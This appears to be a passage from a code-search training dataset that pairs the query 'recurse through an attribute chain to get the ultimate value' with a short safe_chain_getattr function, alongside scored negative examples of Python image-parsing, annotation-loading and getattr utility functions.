ann['segmentation'] if len(p) >= 6\n ] # valid polygons have >= 3 points (6 coordinates)\n poly_lens = [len(p) for p in mask_polys]\n gt_mask_polys.append(mask_polys)\n gt_poly_lens.extend(poly_lens)\n \n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n # assert len(gt_masks) == len(gt_bboxes), f\"{len(gt_masks), len(gt_bboxes)}, {gt_bboxes_ignore}\"\n\n ann = dict(\n img_id=img_id,\n rf_img=rf_imgs,\n rf_mask=rf_masks,\n rf_ann_id=(idx, img_id, cat, rf_ann_ids),\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore)\n\n if self.with_mask:\n ann['masks'] = gt_masks\n # poly format is not used in the current implementation\n ann['mask_polys'] = gt_mask_polys\n ann['poly_lens'] = gt_poly_lens\n return ann", "def olive_image_parser(text: bytes) -> Optional[dict]:\n soup = BeautifulSoup(text, \"lxml\")\n root = soup.find(\"xmd-entity\")\n\n try:\n assert root is not None\n img = {\n 'id': root.get('id'),\n 'coords': root.img.get('box').split(),\n 'name': root.meta.get('name'),\n 'resolution': root.meta.get('images_resolution'),\n 'filepath': root.img.get('href')\n }\n return img\n except AssertionError:\n return None", "def _parse_tfexample(example):\n\n ## parse\n features = tf.parse_single_example(example, KEYS2FEATURES)\n\n image = tf.image.decode_png(features['image/encoded'])\n label = tf.image.decode_png(features['label/encoded'])\n # label is decoded as a 3-D png image\n label = label[..., 0]\n im_path = features['image/path']\n la_path = features['label/path']\n\n return image, label, im_path, la_path", "def _parse_anno_info(self, annotations):\n gt_bboxes, gt_bboxes_ignore = [], []\n gt_masks, gt_masks_ignore = [], []\n gt_labels = []\n for ann in annotations:\n if ann.get('iscrowd', False):\n gt_bboxes_ignore.append(ann['bbox'])\n gt_masks_ignore.append(ann.get('segmentation', None))\n else:\n gt_bboxes.append(ann['bbox'])\n gt_labels.append(ann['category_id'])\n gt_masks.append(ann.get('segmentation', None))\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n ann = dict(\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore,\n masks_ignore=gt_masks_ignore,\n masks=gt_masks)\n\n return ann", "def tag_parser(file_path: str):\n with open(file_path) as f:\n t = f.read()\n t = t.split(\"Points =\\n\")[1]\n t = t.replace(\" 0.1 1 1 \\\"Marker\\\"\", \"\")\n t = t.replace(\";\", \"\")\n t = t.replace(\" \\n\", \"\\n\")\n t = t[1:]\n t = StringIO(t)\n\n return np.genfromtxt(t, delimiter=' ')", "def load_annotations_from_file_in_mtr_format(filepath: str) -> List[Union[str, int, float]]:\n with open(filepath, 'r') as f:\n json_obj = json.load(f)\n # print(json_obj)\n bounding_boxes = json_obj['bounding_boxes']\n \n # filter out noisy annotations\n # and convert the data to kitti MOTS data format\n \n # []\n annotation_list = []\n track_id = -1\n for bboxes in bounding_boxes:\n if(bboxes['center']['z'] is None or 
bboxes['height'] is None or bboxes['height'] < 0.01 \\\n or bboxes['width'] < 0.01 or bboxes['length'] < 0.01):\n continue\n # annotation = [frame_id, -1]\n annotation = []\n # print(\"type: \", str2id(bboxes['object_id']))\n # object_type = bboxes['object_id'] # suppress as 'pedestrian'\n object_type = 'pedestrian'\n # truncated = -1\n # occluded = -1\n # alpha = -1\n # bbox2d = [-1, -1, -1, -1]\n dimensions = [bboxes['height'], bboxes['width'], bboxes['length']]\n # dimensions = [bboxes['height'], bboxes['length'], bboxes['width']]\n location = [bboxes['center']['x'], bboxes['center']['y'], bboxes['center']['z']]\n rotation_y = bboxes['angle']\n\n annotation.append(object_type)\n # annotation.append(truncated)\n # annotation.append(occluded)\n # annotation.append(alpha)\n # annotation += bbox2d\n annotation += dimensions\n annotation += location\n annotation.append(rotation_y)\n annotation_list.append(annotation)\n return annotation_list\n\n \"\"\"\n \"\"\"", "def prepare_train_img(self, index):\n img_ann_info = self.data_infos[index]\n img_info = {\n 'filename': img_ann_info['file_name'],\n 'height': img_ann_info['height'],\n 'width': img_ann_info['width']\n }\n ann_info = self._parse_anno_info(img_ann_info['annotations'])\n results = dict(img_info=img_info, ann_info=ann_info)\n results['bbox_fields'] = []\n results['mask_fields'] = []\n results['seg_fields'] = []\n self.pre_pipeline(results)\n\n return self.pipeline(results)", "def extract_visual(flir_image_path):\n\n visual_img_bytes = subprocess.check_output([\"exiftool\", \"-EmbeddedImage\", \"-b\", flir_image_path])\n visual_img_stream = io.BytesIO(visual_img_bytes)\n\n visual_img = Image.open(visual_img_stream)\n visual_np = np.array(visual_img)\n\n return visual_np", "def parse_image_data(image_urls):\n\n # Initialize images.\n initialized_ClImages = list(map(ClImage, image_urls))\n app = ClarifaiApp(api_key=CLARIFAI_KEY)\n image_info = {}\n\n # Obtain relevant tag information\n try:\n general_response = app.models.get('general-v1.3').predict(initialized_ClImages)\n except ApiError as e:\n error = json.loads(e.response.content)\n pprint('error: {}'.format(error))\n\n else:\n for item in general_response['outputs']:\n video_id = item['input']['data']['image']['url'][23:34]\n thumbnail_tags = set()\n for tag in item['data']['concepts']:\n if tag['value'] > .9:\n tag_string = tag['name'].strip().lower()\n if not Tag.query.filter(Tag.tag == tag_string).first():\n add_tag_data(tag_string)\n thumbnail_tags.add(tag_string)\n image_info[video_id] = {'tags': thumbnail_tags}\n\n\n # Obtain nsfw score\n try:\n nsfw_response = app.models.get('nsfw-v1.0').predict(initialized_ClImages)\n except ApiError as e:\n error = json.loads(e.response.content)\n pprint('error: {}'.format(error))\n\n else:\n for item in nsfw_response['outputs']: #nsfw_r['outputs'] is a list\n video_id = item['input']['data']['image']['url'][23:34]\n nsfw_score = round(item['data']['concepts'][-1]['value'] * 100)\n image_info[video_id]['nsfw_score'] = nsfw_score\n\n\n # Obtain color data\n # try:\n # color_response = app.models.get('color').predict(initialized_ClImages)\n # except ApiError as e:\n # error = json.loads(e.response.content)\n # pprint('error: {}'.format(error[-100:]))\n\n # else:\n # for item in color_response['outputs']:\n # video_id = item['input']['data']['image']['url'][23:34]\n # color_tags = {}\n # for color in item['data']['colors']: # item['data']['colors'] is a list\n # if color['value'] > .2:\n # color_hex = color['w3c']['hex'].rstrip().lower()\n # 
color_name = color['w3c']['name'].rstrip().lower()\n # if not Color.query.filter(Color.hex_code == color_hex).first():\n # add_color_data(color_hex, color_name)\n # image_info[video_id]['colors'] = color_tags\n\n return image_info", "def process_payload(payload):\n\n # Convertion of payload string to image array for opencv\n ret, img = make_image(payload)#ret is 0 when conversion is successful or 1 when not\n result='Unable to detect'\n if ret == 0:\n cv2.imwrite('received.png', img)\n try:\n roi = extract_roi_2(img)\n \n result = detect(roi) \n \n #write_characters(roi)\n\n except:\n result = \"----------------\"\n # # When roi is extracted its a 2d array \n \n return result", "def _load_kitti_annotation(self, index):\n\n if self._image_set == 'test':\n lines = []\n else:\n filename = os.path.join(self._data_path, 'training', 'label_2', index + '.txt')\n lines = []\n with open(filename) as f:\n for line in f:\n words = line.split()\n cls = words[0]\n truncation = float(words[1])\n occlusion = int(words[2])\n height = float(words[7]) - float(words[5])\n if cls in self._class_to_ind and truncation < 0.5 and occlusion < 3 and height > 25:\n #if cls in self._class_to_ind:\n lines.append(line)\n\n num_objs = len(lines)\n \n boxes = np.zeros((num_objs, 4), dtype=np.float32)\n gt_classes = np.zeros((num_objs), dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n\n for idx, line in enumerate(lines):\n words = line.split()\n cls = self._class_to_ind[words[0]]\n boxes[idx, :] = [float(num) for num in words[4:8]]\n gt_classes[idx] = cls\n overlaps[idx, cls] = 1.0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n return {'boxes' : boxes,\n 'gt_classes' : gt_classes,\n 'gt_overlaps' : overlaps,\n 'flipped' : False}", "def parse_info(df, idx, root):\n df_row = df.iloc[idx]\n\n img_id = str(df_row['id'])\n img_name = id_to_path(root, img_id)\n landmark_id = df_row.landmark_id\n return img_name, landmark_id", "def inspect_every_images_with_annotations_of_folder(image_path, annotation_path):\n assert os.path.isdir(image_path)\n assert os.path.isdir(annotation_path)\n list_images = os.listdir(image_path)\n list_annotations = os.listdir(annotation_path)\n for i in range(len(list_images)):\n image_file, annotation_file = list_images[i], list_annotations[i]\n image = os.path.join(image_path, image_file)\n annotation = os.path.join(annotation_path, annotation_file)\n with Image.open(image) as img:\n tree = ET.parse(annotation)\n root = tree.getroot()\n for member in root.findall('object'):\n # bbox contains 4 coordinate of format [xmin, ymin, xmax, ymax]\n bbox = member.find(\"bndbox\")\n\n # if object is None, ignore\n if member.find(\"name\") is None:\n continue\n\n xmin = int(bbox.find('xmin').text)\n ymin = int(bbox.find('ymin').text)\n xmax = int(bbox.find('xmax').text)\n ymax = int(bbox.find('ymax').text)\n\n draw = ImageDraw.Draw(img)\n draw.rectangle([xmin, ymin, xmax, ymax], width=2)\n img.show()", "def __getitem__(self, index):\n # read a image given a random integer index\n img_path = self.img_paths[index]\n image = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # set paths of annotation maps\n segment_path = os.path.join(self.segment_dir, os.path.basename(img_path))\n edge_path = os.path.join(self.edge_dir, os.path.basename(img_path))\n centerline_path = os.path.join(self.centerline_dir, os.path.basename(img_path))\n\n # load annotation maps and only use the red channel\n segment = cv2.imread(segment_path, 
cv2.IMREAD_UNCHANGED)\n edge = cv2.imread(edge_path, cv2.IMREAD_UNCHANGED)\n centerline = cv2.imread(centerline_path, cv2.IMREAD_UNCHANGED)\n\n # from color to gray\n segment = convert_from_color_annotation(segment)\n edge = convert_from_color_annotation(edge)\n centerline = convert_from_color_annotation(centerline)\n \n # resize\n w, h = self.opt.load_width, self.opt.load_height\n if w > 0 or h > 0:\n image = cv2.resize(image, (w, h), interpolation=cv2.INTER_CUBIC)\n segment = cv2.resize(segment, (w, h), interpolation=cv2.INTER_CUBIC)\n edge = cv2.resize(edge, (w, h), interpolation=cv2.INTER_CUBIC)\n centerline = cv2.resize(centerline, (w, h), interpolation=cv2.INTER_CUBIC)\n\n # apply flip\n if (not self.opt.no_flip) and random.random() > 0.5:\n if random.random() > 0.5:\n image = np.fliplr(image)\n segment = np.fliplr(segment)\n edge = np.fliplr(edge)\n centerline = np.fliplr(centerline)\n else:\n image = np.flipud(image)\n segment = np.flipud(segment)\n edge = np.flipud(edge)\n centerline = np.flipud(centerline)\n\n # apply affine transform\n if self.opt.use_augment:\n if random.random() > 0.5:\n angle, scale, shift = get_params()\n image = affine_transform(image, angle, scale, shift, w, h)\n segment = affine_transform(segment, angle, scale, shift, w, h)\n edge = affine_transform(edge, angle, scale, shift, w, h)\n centerline = affine_transform(centerline, angle, scale, shift, w, h)\n\n # binarize annotation maps\n _, segment = cv2.threshold(segment, 127, 1, cv2.THRESH_BINARY)\n _, edge = cv2.threshold(edge, 127, 1, cv2.THRESH_BINARY)\n _, centerline = cv2.threshold(centerline, 127, 1, cv2.THRESH_BINARY)\n\n # apply the transform to both A and B\n image = self.img_transforms(Image.fromarray(image.copy()))\n segment = self.lab_transform(segment.copy()).unsqueeze(0).float()\n edge = self.lab_transform(edge.copy()).unsqueeze(0).float()\n centerline = self.lab_transform(centerline.copy()).unsqueeze(0).float()\n\n return {'image': image, \n 'segment': segment, \n 'edge': edge, \n 'centerline': centerline, \n 'A_paths': img_path}", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def parse_img(image_path):\n image = tf.read_file(image_path)\n image = tf.image.decode_image(image)\n image = tf.reshape(image, [INITIAL_RES, INITIAL_RES, 3])\n image = tf.image.resize_images(image, [OUTPUT_RES, OUTPUT_RES])\n #image = image[:, :, ::-1] # BGE -> RGB conversion if needed?\n #image = tf.image.rgb_to_grayscale(image)\n #image = tf.image.convert_image_dtype(image, tf.float32) # In neuralNet.py\n image = image.eval() # Convert from tensor to Numpy array for Keras\n return image", "def get(self,index,record, indices):\n video_id = str(record.path).strip().split('/frames/')[1]\n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_class + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_class),dtype = np.float)\n count = 0\n images =[]\n\n class_label =int(record.labels)\n one_hot_labels[class_label] = 1\n frame_index = 
list(self._mat_gt_[video_id].keys()) \n \n for seg_ind in indices:\n\n #image information \n cur_frame = frame_index[0]+seg_ind\n image_path = os.path.join(record.path, '{:05d}.jpg'.format(cur_frame))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n \n gt[count,0,:4] = self._load_UCF101_annotation(video_id,cur_frame,self._mat_gt_) \n x1,y1,x2,y2 = gt[count,0,:4]\n y1,y2 = y1*im_scale1,y2*im_scale1\n x1,x2 = x1*im_scale2,x2*im_scale2\n gt[count,0,:4] = x1,y1,x2,y2\n #if gt[count,0,:4].any():\n gt[count,0,4:] = one_hot_labels\n #else:\n # gt[count,0,4:] = np.zeros((1,self.cfg.MAX_NUM_GT_BOXES,self.num_class),dtype = float)\n \n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info", "def load_annotations(self):\n if self.ann_file.endswith('.json'):\n return self.load_json_annotations()\n\n video_infos = []\n with open(self.ann_file, 'r') as fin:\n for line in fin:\n line_split = line.strip().split()\n if self.multi_class:\n assert self.num_classes is not None\n filename, label = line_split[0], line_split[1:]\n label = list(map(int, label))\n else:\n filename, label = line_split\n label = int(label)\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_infos.append(dict(filename=filename, label=label))\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def parser(self, serialized_example):\n features = {\n 'image/height': tf.FixedLenFeature([], tf.int64),\n 'image/width': tf.FixedLenFeature([], tf.int64),\n 'image/colorspace': tf.FixedLenFeature([], tf.string),\n 'image/channels': tf.FixedLenFeature([], tf.int64),\n 'image/class/label': tf.FixedLenFeature([], tf.int64),\n 'image/format': tf.FixedLenFeature([], tf.string),\n 'image/encoded': tf.FixedLenFeature([], tf.string),\n 'image/fixation_pt': tf.FixedLenFeature([2], tf.float32)}\n parsed_features = tf.parse_single_example(serialized_example, features)\n\n # Get label as a Tensor.\n label = parsed_features['image/class/label']\n\n # Decode the image JPEG string into a Tensor.\n image = tf.image.decode_jpeg(parsed_features['image/encoded'],\n channels=self.DEPTH)\n\n # Convert from uint8 -> float32 and map onto range [0, 1].\n image = tf.cast(image, tf.float32) * (1. 
/ 255)\n\n # Standardize image.\n image = tf.image.per_image_standardization(image)\n\n # Apply data augmentation.\n if (self.mode == tf.estimator.ModeKeys.TRAIN\n and self.params['train_with_distortion']):\n # Randomly flip the image, zero-pad with four pixels along\n # each edge, and take a random 32 x 32 crop.\n image = tf.image.random_flip_left_right(image)\n image = tf.image.resize_image_with_crop_or_pad(image, 40, 40)\n image = tf.image.crop_to_bounding_box(image,\n tf.random_uniform([], minval=0, maxval=8, dtype=tf.int32),\n tf.random_uniform([], minval=0, maxval=8, dtype=tf.int32),\n 32, 32)\n\n return image, label", "def parse_line(line):\n\n line = line.split(' ')\n _, _, top_left_x, top_left_y, width, height, rotation = [float(x) for x in line]\n box = cv2.boxPoints(((top_left_x + width / 2, top_left_y + height / 2),\n (width, height), rotation * 57.2958))\n quadrilateral = [int(x) for x in box.reshape([-1])]\n xmin = min(quadrilateral[0::2])\n xmax = max(quadrilateral[0::2])\n\n ymin = min(quadrilateral[1::2])\n ymax = max(quadrilateral[1::2])\n\n word_annotation = {\n 'bbox': [xmin, ymin, xmax - xmin, ymax - ymin],\n 'segmentation': [quadrilateral],\n 'attributes': {\n 'transcription': '',\n 'legible': 1,\n 'language': '',\n }\n }\n\n return word_annotation" ]
[ "0.66137487", "0.6137905", "0.6088444", "0.60218704", "0.6018169", "0.6017987", "0.6013739", "0.59796065", "0.5911451", "0.58495057", "0.584628", "0.5830778", "0.58306414", "0.5818035", "0.58085626", "0.5796074", "0.57908374", "0.5716362", "0.57042414", "0.5697437", "0.56964636", "0.568658", "0.5676072", "0.56731385", "0.565975", "0.5659391", "0.5657615", "0.5655633", "0.5651093", "0.56453943", "0.5641678", "0.5639812", "0.56332576", "0.5631421", "0.5631421", "0.5629971", "0.562391", "0.561179", "0.5602923", "0.5593124", "0.5591606", "0.55909663", "0.55824256", "0.5578133", "0.55753595", "0.5571614", "0.5567002", "0.5564263", "0.5547136", "0.5534025", "0.55244267", "0.5520432", "0.551903", "0.55186504", "0.5497994", "0.54956514", "0.5494844", "0.54943496", "0.548561", "0.5467481", "0.54620874", "0.5459843", "0.54565334", "0.545425", "0.54526466", "0.54446375", "0.544399", "0.543834", "0.5435859", "0.5432993", "0.54266393", "0.5424577", "0.5423968", "0.5419924", "0.541656", "0.5407224", "0.54045033", "0.5395582", "0.538799", "0.5386226", "0.5375711", "0.53743374", "0.53721046", "0.5364236", "0.53586274", "0.53551686", "0.53551155", "0.5351515", "0.53467536", "0.53426373", "0.5341988", "0.5327872", "0.53188914", "0.53146034", "0.5314533", "0.5313252", "0.5308743", "0.53058964", "0.5302833", "0.53012705" ]
0.6034063
3
recurse through an attribute chain to get the ultimate value.
def safe_chain_getattr(obj, attr): return reduce(getattr, attr.split('.'), obj)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next(self):\n nextattr = self.iterobj.next()\n return (nextattr.name, self.attrs[nextattr.name])", "def _get_effective_attribute(self, attribute_name):\n result = []\n tmp = self[attribute_name]\n if tmp != None:\n result.append( tmp )\n if tmp == None or tmp.startswith('+'):\n for parent in self.get_parents():\n result.append( parent._get_effective_attribute(attribute_name) )\n if parent[attribute_name] != None and not parent[attribute_name].startswith('+'):\n break\n return_value = []\n for value in result :\n value = value.strip('+')\n if value == '': continue\n if value not in return_value:\n return_value.append( value )\n tmp = ','.join( return_value )\n tmp = tmp.replace(',,',',')\n return tmp", "def anchor(self):\n # self.attributes cannot be empty; will cause an error on init.\n return self.attributes[-1]", "def chain_getattr(obj, attr, value=None):\n try:\n return _resolve_value(safe_chain_getattr(obj, attr))\n except AttributeError:\n return value", "def _get_attr_recursive(self, name, memo=None):\n # `name` is dot-delimited, so split it up into distinct names:\n name_list = name.split('.')\n # The first name has special treatment, since it might need to\n # be dynamically built:\n top_attr_name = name_list[0]\n # NOTE: This raises AttributeError if the attribute doesn't\n # exist. (Optional attributes should exist and be None-valued)\n attr = getattr(self, top_attr_name)\n # If this is an optional attribute and it hasn't been explicitly\n # provided, build it dynamically:\n if attr is None and top_attr_name in self.default_values:\n attr = self.build_param(top_attr_name, memo=memo)\n # If there are no further identifiers, we're done!\n if len(name_list) == 1:\n return attr\n # Otherwise, recursively call getattr on each sub-identifier.\n else:\n return reduce(getattr, name_list[1:], attr)", "def MoveToNextAttribute(self):\n ret = libxml2mod.xmlTextReaderMoveToNextAttribute(self._o)\n return ret", "def get_attribute_value(self, typ, attr_name):\n for base_typ in self._get_mro(typ):\n serialized_base = self.serialize_type(base_typ)\n if serialized_base is None:\n continue\n value = self.attribute_values[serialized_base].get(attr_name)\n if value is not None:\n return value\n else:\n return UNRESOLVED_VALUE", "def select_attribute(instances, available_attributes, domain):\n\n\n entropies = {}\n for att in available_attributes:\n entropies[att] = entropy_new(instances, att, domain)\n \n next_attrib, (_ent, leaves) = min(list(entropies.items()), key=lambda x: x[1][0])\n \n return next_attrib, leaves", "def mineral_attr(attribute):\n return attribute[0]", "def __call__(self):\r\n return self[-1]", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def last_value():\n return blockchain[-1]", "def get_rel_attr(self, attr_name, model):\n rel_attr_name, attr_name = attr_name.split('.', 1)\n rel_attr = getattr(self.model, rel_attr_name, None)\n rel_model = None\n attr = None\n\n if rel_attr is not None:\n rel_model = rel_attr.property.mapper.class_\n attr = getattr(rel_model, attr_name, None)\n\n return (rel_model, attr)", "def get_last(self):\n return self.get_block(len(self.chain)-1)", "def get_radist_value(line):\n assert line.startswith(' ')\n key, value = line.split('=')\n key = key.strip()\n return key, attr_map[key](value)", "def get_last_blockchainvalue(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def deepgetattr(obj, attr):\n\t\treturn reduce(getattr, attr.split('.'), obj)", "def 
get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def penultimate(self) -> OptCoordinates:\n if len(self) < 2:\n raise IndexError(\n \"Cannot obtain the penultimate set of \"\n f\"coordinates, only had {len(self)}\"\n )\n\n return self[-2]", "def _get_attribute(self):\n return self.split_text[1] if len(self.split_text) > 1 else \"\"", "def sequence_last(self):\n return max(list(self.nodes_attribute(name=\"_k\")))", "def __arb__(self):\n if self.tree.total < 1:\n return None\n if self.tree.total % 2 == 0:\n return self.first()\n else:\n return self.last()", "def get_leaves_attr(self, attr: str):\n\n return [getattr(q, attr) for q in self.leaves]", "def last_value(self):\n return self._value", "def get_attribute(self, lexeme: str) -> typing.Union[Attributes.Attributes]:\n return self._parent_node.get_attribute(lexeme)", "def last_percept(self):\n return self.percept", "def __getattr__(self, attr):\n for resource in lineage(self):\n if attr in resource.__initial_attrs__:\n value = self.__dict__[attr] = getattr(resource, attr)\n return value\n raise AttributeError(\n '{!r} object has no attribute {!r}'.format(self, attr))", "def __next__(self):\n self._iteration_index += 1\n if self._iteration_index < self._length:\n return self._child_values[self._iteration_index]\n raise StopIteration", "def get_attr_unwrapped(fun: callable, attr_name, *default_value):\n while fun:\n try:\n return getattr(fun, attr_name)\n except AttributeError:\n fun = getattr(fun, '__wrapped__', None)\n if default_value:\n return default_value[0]\n raise AttributeError(attr_name)", "def visit(self, node):\n super(_GetattrNodeVisitor, self).visit(node)", "def get_attribute(root, attribute):\n command_tree = [root]\n while command_tree:\n current_object = command_tree.pop()\n if hasattr(current_object, attribute):\n return getattr(current_object, attribute)\n\n parent = getattr(current_object, \"parent\", None)\n if parent:\n command_tree.append(parent)\n\n raise exception.ArestorException(\"The %(attribute)r attribute is \"\n \"missing from the object tree.\",\n attribute=attribute)", "def get_attr(attributes, name):\n try:\n return attributes.getValue(name)\n except KeyError:\n return None", "def _get_attr(self, attr, root=None):\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]", "def visit_Attribute(self, node):\n\n if isinstance(node.value, ast.Name):\n attr_str = \"%s.%s\" % (node.value.id, node.attr)\n if self._is_write_ctx(node.ctx):\n self.yield_checker.record_assignment(attr_str)\n else:\n self.yield_checker.record_usage(attr_str, node)\n\n root_value = self.visit(node.value)\n if self._is_write_ctx(node.ctx):\n return self._visit_set_attribute(node, root_value)\n elif self._is_read_ctx(node.ctx):\n if self._is_checking():\n self.asynq_checker.record_attribute_access(root_value, node.attr, node)\n value = self._get_attribute(node, node.attr, root_value)\n if self._should_use_varname_value(value):\n varname_value = VariableNameValue.from_varname(\n 
node.attr, self.config.varname_value_map()\n )\n if varname_value is not None:\n return varname_value\n if self.scope.scope_type() == ScopeType.function_scope:\n composite = self.varname_for_constraint(node)\n if composite:\n local_value = self.scope.current_scope().get_local(\n composite, node, self.state, fallback_value=value\n )\n if isinstance(local_value, MultiValuedValue):\n vals = [\n val\n for val in local_value.vals\n if val is not UNINITIALIZED_VALUE\n ]\n if vals:\n local_value = unite_values(*vals)\n else:\n local_value = UNINITIALIZED_VALUE\n if local_value is not UNINITIALIZED_VALUE:\n value = local_value\n value = self._maybe_use_hardcoded_type(value, node.attr)\n return value\n else:\n self.show_error(node, \"Unknown context\", ErrorCode.unexpected_node)\n return None", "def process(name, attr):\n\t\t\t\n\t\t\t# If no name has been defined, define it declaratively.\n\t\t\tif not getattr(attr, '__name__', None):\n\t\t\t\tattr.__name__ = name\n\t\t\t\n\t\t\t# If this attribute existed previously, clone the sequence number to preserve order.\n\t\t\tif name in overridden_sequence:\n\t\t\t\tattr.__sequence__ = overridden_sequence[name]\n\t\t\t\n\t\t\t# We give attributes a chance to perform additional work.\n\t\t\tif hasattr(attr, '__fixup__'):\n\t\t\t\tfixups.append(attr) # Record the attribute to prevent __get__ transformation later.\n\t\t\t\n\t\t\treturn name, attr", "def get_value(self):\n attr = getattr(self.obj, self.attr)\n try:\n args = self.args\n kwargs = self.kwargs\n return attr(*args, **kwargs)\n except AttributeError:\n return attr", "def try_scope_attr_until_success(self, attr_name):\n for i, scope in enumerate(reversed(self.scopes)):\n try:\n a = getattr(scope, attr_name)\n except NotInScopeError:\n # If not at outer scope, pass and try the next scope outwards.\n if i < len(self.scopes) - 1:\n pass\n # If at outer scope, it really hasn't been found.\n else:\n raise\n else:\n return a\n raise NotInScopeError", "def last_value(self):\n return self._last_value", "def getattr_recursive(self, name):\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, 'getattr_recursive'):\n # Attribute not present, child is wrapper. Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def _resolve_attr(self, obj, attrspec):\n attrssplit = attrspec.split(\".\")\n attr = attrssplit[0]\n try:\n obj = obj[int(attr)] # In case list element\n except ValueError:\n try:\n obj = obj[attr]\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n if len(attrssplit) > 1:\n attrspec = attrspec.partition(\".\")[2] # right part of the string.\n return self._resolve_attr(obj, attrspec) # Recurse\n return obj", "def getattr_recursive(self, name: str) -> Any:\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, \"getattr_recursive\"):\n # Attribute not present, child is wrapper. 
Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def _dqa(self, attr):\n if isinstance(attr, tuple) and not attr[0]:\n return attr[1]\n else:\n return attr", "def get_attr(self, value):\n return self.index[value]", "def value(self):\n if self.children == tuple():\n return sum(self.meta)\n total = 0\n for meta in self.meta:\n if 0 < meta <= len(self.children):\n total += self.children[meta-1].value()\n return total", "def deepgetattr(obj, attr, default=AttributeError):\n try:\n return reduce(getattr, attr.split(\".\"), obj)\n except AttributeError:\n if default is not AttributeError:\n return default\n raise", "def _get_value_by_attribute(self, die, attribute):\n # in the case of str form data `DW_FORM_strp`, return str\n if attribute.form == \"DW_FORM_strp\":\n return attribute.value.decode(\"utf-8\", errors=\"ignore\")\n\n # parse `DW_AT_decl_file`\n if attribute.name == \"DW_AT_decl_file\":\n if attribute.value == 0:\n return attribute.value\n lineprogram = die.dwarfinfo.line_program_for_CU(die.cu)\n file_entry = lineprogram.header.file_entry[attribute.value-1]\n file_name = file_entry.name.decode(\"utf-8\", errors=\"ignore\")\n file_dir_bytes = lineprogram.header.include_directory[file_entry.dir_index-1] # noqa: E501\n file_dir = file_dir_bytes.decode(\"utf-8\", errors=\"ignore\")\n return file_dir + \"/\" + file_name\n\n # if 